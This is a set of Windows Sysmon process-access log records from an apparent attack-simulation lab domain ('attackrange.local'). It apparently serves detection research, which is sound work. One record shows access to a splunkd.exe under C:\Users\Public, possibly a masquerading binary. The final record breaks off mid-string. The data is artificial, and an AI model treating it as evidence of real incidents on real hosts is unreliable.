{"EventTime":"2020-08-01 07:02:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8805,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:57.326\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:57.326","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8806,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:57.326\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:57.326","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8807,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:57.326\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:57.326","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8808,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:57.326\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:57.326","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8809,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:57.326\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:57.326","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8810,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:57.326\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:57.326","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8811,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:57.326\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-13A1-5F25-0000-00101F9B1000}\r\nTargetProcessId: 2520\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:57.326","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-13A1-5F25-0000-00101F9B1000}","TargetProcessId":"2520","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8812,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:57.451\r\nSourceProcessGUID: {E2A3D6B1-13A1-5F25-0000-00101F9B1000}\r\nSourceProcessId: 2520\r\nSourceThreadId: 3824\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nTargetProcessId: 1828\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:57.451","SourceProcessGUID":"{E2A3D6B1-13A1-5F25-0000-00101F9B1000}","SourceProcessId":"2520","SourceThreadId":"3824","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","TargetProcessId":"1828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8813,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:57.623\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files 